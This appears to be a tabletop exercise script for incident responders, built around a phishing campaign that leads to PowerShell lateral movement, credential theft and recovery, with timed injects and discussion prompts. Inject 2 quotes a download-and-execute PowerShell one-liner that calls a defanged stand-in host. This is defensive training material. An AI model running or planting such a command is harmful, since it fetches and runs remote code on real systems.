WithPCI Logo
WithPCI.com

Sophisticated Phishing Campaign Response

Scenario Overview

Exercise Type: Technical Simulation Tabletop Exercise Target Audience: SOC Analysts, Incident Responders, IT Operations, Cybersecurity Engineers Scenario: Multi-Stage Phishing Campaign Leading to Network Compromise Duration: 120-150 minutes Exercise Objective: Validate technical response capabilities to weaponized document leading to PowerShell-based lateral movement

Facilitator Guidelines

  • Encourage deep technical discussions of detection/response tools
  • Focus on MITRE ATT&CK framework alignment (T1566.001, T1059.001)
  • Track chain of custody considerations for forensic evidence
  • Time-box discussions to simulate real-world pressure

Exercise Script

INJECT 1: Initial User Report (Day 1 - 09:15 AM)

Situation:

  • Finance analyst reports to help desk:
    • Received "Invoice #INV-22841" email from trusted vendor @supplychainpartner.com
    • Opened PDF containing blurred content prompting "Enable Macros to View"
    • Post-opening observed:
      • Brief PowerShell windows flashing
      • Unusual CPU spikes
      • Outlook sending 47 "Payment Update" emails to internal contacts

Facilitator Notes:

  • Evaluate isolation procedures
  • Note discussions about live memory analysis

DISCUSSION PROMPT: "What immediate containment steps? What forensic data should be collected from endpoint?"

INJECT 2: Malware Analysis (Day 1 - 10:30 AM)

Situation:

  • Security team findings:
    • PDF contains embedded VBA macro executing:
-ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxps://aws-s3[.]maliciouscdn[.]net/loader.ps1')"

- C2 Infrastructure:
    - 3 AWS EC2 instances (54.193.22[.]18, 54.219.5[.]91, 54.177.235[.]102)
    - Domain generation algorithm observed (tbbdns[.]com subdomains)
- VirusTotal: 2/68 AV detections (Trojan.PowerShell.Agent.gen)

Facilitator Notes:

  • Assess understanding of living-off-the-land techniques
  • Note discussions about AWS abuse reporting

DISCUSSION PROMPT: "What network containment measures? How would you modify EDR rules?"

INJECT 3: Lateral Movement Detected (Day 1 - 1:45 PM)

Situation:

  • SIEM correlation reveals:
    • 82 hosts with outbound connections to C2 IPs
    • Critical assets affected:
      • AD Domain Controllers (DC01-DC04)
      • SAP ERP servers
      • VMware vCenter management nodes
    • Attack pattern:
      • PsExec via compromised service account
      • Mimikatz credential dumping
      • Schtasks creating persistence

Facilitator Notes:

  • Evaluate credential rotation procedures
  • Note discussions about Active Directory forest recovery

DISCUSSION PROMPT: "What critical systems require immediate isolation? How to contain AD compromise?"

INJECT 4: Campaign Scope Expansion (Day 2 - 8:00 AM)

Situation:

  • Vendor breach confirmation:
    • SupplyChainPartner.com's O365 tenant compromised via token theft
    • Attackers exfiltrated 3 years of email communications
  • Internal findings:
    • 14% of finance team received similar emails
    • 9 compromised accounts with DA privileges
    • RDP sessions from [WithPCI.com Company Name] IPs to Russian ASN 12389

Facilitator Notes:

  • Assess third-party communication protocols
  • Note discussions about privileged access management

DISCUSSION PROMPT: "What external communications are required? How to validate eradication completeness?"

INJECT 5: EDR Configuration Failure (Day 2 - 2:30 PM)

Situation:

  • CrowdStrike Falcon analysis shows:
    • PowerShell execution blocked in "Prevention" policy
    • Exception exists for "Finance_Invoicing" workflow
    • 228 alerts suppressed via "Medium Severity" filter
  • Process tree analysis reveals:
    • winword.exe ➔ cmd.exe ➔ powershell.exe ➔ certutil.exe (binary download)

Facilitator Notes:

  • Evaluate policy exception management
  • Note discussions about behavioral detection tuning

DISCUSSION PROMPT: "How would you reconfigure EDR policies? What compensating controls are needed?"

INJECT 6: Recovery Operations (Day 5 - 9:00 AM)

Situation:

  • Containment metrics:
    • 1,127 systems requiring rebuild
    • 43% of backups failed hash verification
    • AD system key not available for authoritative restore
  • Threat intelligence indicates:
    • Ransomware payload found dormant in QA environment
    • Threat actors maintain VPN tunnel via compromised IoT device

Facilitator Notes:

  • Highlight backup integrity verification processes
  • Note discussions about rebuild vs. forensic preservation

DISCUSSION PROMPT: "What recovery sequencing ensures operational continuity? How validate attacker eradication?"

INJECT 7: Post-Incident Validation (Day 7 - 3:00 PM)

Situation:

  • Current state:
    • 92% systems rebuilt with updated images
    • Purple team exercise finds:
      • 8 persistent scheduled tasks missed
      • 2 golden tickets still active
    • CISO demands:
      • Full network segmentation implementation
      • Zero-trust architecture roadmap within 90 days

Facilitator Notes:

  • Focus on continuous validation strategies
  • Note discussions about security control gaps

DISCUSSION PROMPT: "What metrics prove network cleanliness? How institutionalize lessons learned?"

Exercise Debrief

Technical Focus Areas:

  1. PowerShell Execution Prevention
  2. Living-off-the-Land Attack Detection
  3. Active Directory Recovery Procedures
  4. EDR Policy Configuration Management
  5. Backup Integrity Verification

After-Action Deliverables:

  • Updated incident response playbook with phishing-specific runbooks
  • EDR policy exception review process
  • AD forest recovery test plan
  • Third-party communication protocol revisions

Next Steps:

  • Conduct full credential reset across all systems
  • Implement PowerShell Constrained Language Mode
  • Schedule quarterly phishing IR fire drills

Your perspective on this PCI DSS requirement matters! Share your implementation experiences, challenges, or questions below. Your insights help other organizations improve their compliance journey and build a stronger security community.Comment Policy